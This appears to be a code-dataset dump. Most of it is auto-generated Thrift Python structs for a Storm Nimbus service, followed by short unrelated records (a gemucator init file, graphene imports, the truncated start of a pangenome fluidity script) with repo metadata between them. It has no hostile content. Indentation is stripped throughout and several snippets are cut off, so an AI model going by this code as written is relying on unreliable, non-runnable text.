thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('uploadChunk_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class finishFileUpload_args:
"""
Attributes:
- location
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'location', None, None, ), # 1
)
def __init__(self, location=None,):
self.location = location
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.location = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('finishFileUpload_args')
if self.location is not None:
oprot.writeFieldBegin('location', TType.STRING, 1)
oprot.writeString(self.location)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class finishFileUpload_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('finishFileUpload_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileDownload_args:
"""
Attributes:
- file
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'file', None, None, ), # 1
)
def __init__(self, file=None,):
self.file = file
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.file = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileDownload_args')
if self.file is not None:
oprot.writeFieldBegin('file', TType.STRING, 1)
oprot.writeString(self.file)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileDownload_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileDownload_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class downloadChunk_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('downloadChunk_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class downloadChunk_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('downloadChunk_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getNimbusConf_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getNimbusConf_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getNimbusConf_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getNimbusConf_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getClusterInfo_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getClusterInfo_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getClusterInfo_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ClusterSummary, ClusterSummary.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ClusterSummary()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getClusterInfo_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyInfo_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyInfo_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyInfo_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TopologyInfo, TopologyInfo.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TopologyInfo()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyInfo_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyConf_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyConf_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyConf_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyConf_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopology_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopology_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopology_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StormTopology()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopology_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getUserTopology_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getUserTopology_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getUserTopology_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StormTopology()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getUserTopology_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 2 | 2 |
gemucator/__init__.py | philipwfowler/genucator | 0 | 5511 | #! /usr/bin/env python
from .core import gemucator
| 1.015625 | 1 |
client/checkout/schema/types.py | daniel-waruo/e-commerse-api | 6 | 5512 | <gh_stars>1-10
import graphene
from graphene_django import DjangoObjectType
from graphene_django.converter import convert_django_field
from pyuploadcare.dj.models import ImageField
| 1.15625 | 1 |
pangenome_fluidity.py | PlantDr430/CSU_scripts | 1 | 5513 | #!/usr/bin/python3
'''
This script follows formulas put forth in Kislyuk et al. (2011) to calculate genome
fluidity of a pangenome dataset. Variance and standard error are estimated as total
variance containing both the variance due to subsampling all possible combinations
(without replacement) of N genomes from the total pool of genomes and the variance
due to the limited number of sampled genomes (variance of the pangenome)(Kislyuk et al. 2011).
However, the script has a default max number of subsamples set to 250,000 for each N genomes.
This can be altered with the -max_sub / --max_subsamples flag or turned off with the --max_off flag.
Turning the max_off will force calculations to be done on all possible subsample combinations
of N genomes. For samples of N genomes that were stopped at the max number of subsamples the subsamples
are sampled WITH replacement and variance is calculated with a degree of freedom = 1 (i.e. n - 1).
Results are a text file of fluidity, variance, and standard error for all N genome samples
and a figure of pangenome fluidity with shaded regions showing total standard error with a
exponential regression fit.
Notes
1. This will only work if you have at least 5 isolates to make up your pangenome.
2. If you have 5 isolates your graph will probably not look pretty as it's difficult
to fit with such a low number of samples.
'''
import os, sys, re, argparse, random, itertools, scipy, warnings, subprocess
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from multiprocessing import Pool
from itertools import combinations
from collections import OrderedDict
from collections.abc import Iterable
from scipy.optimize import curve_fit, differential_evolution
rundir = os.getcwd()
class MyFormatter(argparse.RawTextHelpFormatter):
def __init__(self, prog):
super(MyFormatter, self).__init__(prog, max_help_position=48)
parser = argparse.ArgumentParser(
usage='./%(prog)s [options] -i orthogroups -o output_folder',
description = ''' Performs multiple bootstraps and calculates genome fluidity
from a pangenome dataset (orthogroups).''',
epilog = """Written by <NAME> (2019)""",
formatter_class = MyFormatter)
parser.add_argument(
'-i',
'--input',
required = True,
